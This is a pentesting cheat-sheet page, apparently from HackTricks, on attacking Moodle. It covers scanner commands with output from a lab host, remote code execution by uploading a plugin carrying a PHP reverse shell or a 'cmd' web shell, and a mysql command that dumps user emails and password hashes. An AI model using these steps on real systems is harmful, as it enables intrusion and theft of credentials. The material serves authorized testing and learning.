Moodle
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
​
​
.png?alt=media&token=13f4d279-7d3f-47ce-a68e-35f9a906973f)
If you are interested in hacking career and hack the unhackable - we are hiring! (fluent polish written and spoken required).
pip3 install droopescan
droopescan scan moodle -u http://moodle.example.com/<moodle_path>/
​
[+] Plugins found:
forum http://moodle.schooled.htb/moodle/mod/forum/
http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt
http://moodle.schooled.htb/moodle/mod/forum/version.php
​
[+] No themes found.
​
[+] Possible version(s):
3.10.0-beta
​
[+] Possible interesting urls found:
Static readme file. - http://moodle.schooled.htb/moodle/README.txt
Admin panel - http://moodle.schooled.htb/moodle/login/
​
[+] Scan finished (0:00:05.643539 elapsed)
#Install from https://github.com/inc0d3/moodlescan
python3 moodlescan.py -k -u http://moodle.example.com/<moodle_path>/
​
Version 0.7 - Dic/2020
.............................................................................................................
​
By Victor Herrera - supported by www.incode.cl
.............................................................................................................
​
Getting server information http://moodle.schooled.htb/moodle/ ...
​
server : Apache/2.4.46 (FreeBSD) PHP/7.4.15
x-powered-by : PHP/7.4.15
x-frame-options : sameorigin
last-modified : Wed, 07 Apr 2021 21:33:41 GMT
​
Getting moodle version...
​
Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta
​
Searching vulnerabilities...
​
​
Vulnerabilities found: 0
​
Scan completed.
pip3 install git+https://github.com/dionach/CMSmap.git
cmsmap http://moodle.example.com/<moodle_path>
I found that the automatic tools are pretty useless finding vulnerabilities affecting the moodle version. You can check for them in https://snyk.io/vuln/composer:moodle%2Fmoodle​
You need to have manager role and you can install plugins inside the "Site administration" tab**:**

If you are manager you may still need to activate this option. You can see how ins the moodle privilege escalation PoC: https://github.com/HoangKien1020/CVE-2020-14321.
Then, you can install the following plugin that contains the classic pentest-monkey php rev shell (before uploading it you need to decompress it, change the IP and port of the revshell and crompress it again)
moodle-rce-plugin.zip
3KB
Binary
Or you could use the plugin from https://github.com/HoangKien1020/Moodle_RCE to get a regular PHP shell with the "cmd" parameter.
To access launch the malicious plugin you need to access to:
http://domain.com/<moodle_path>/blocks/rce/lang/en/block_rce.php?cmd=id
find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
/usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"
​
​
.png?alt=media&token=13f4d279-7d3f-47ce-a68e-35f9a906973f)
If you are interested in hacking career and hack the unhackable - we are hiring! (fluent polish written and spoken required).
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Last modified 3mo ago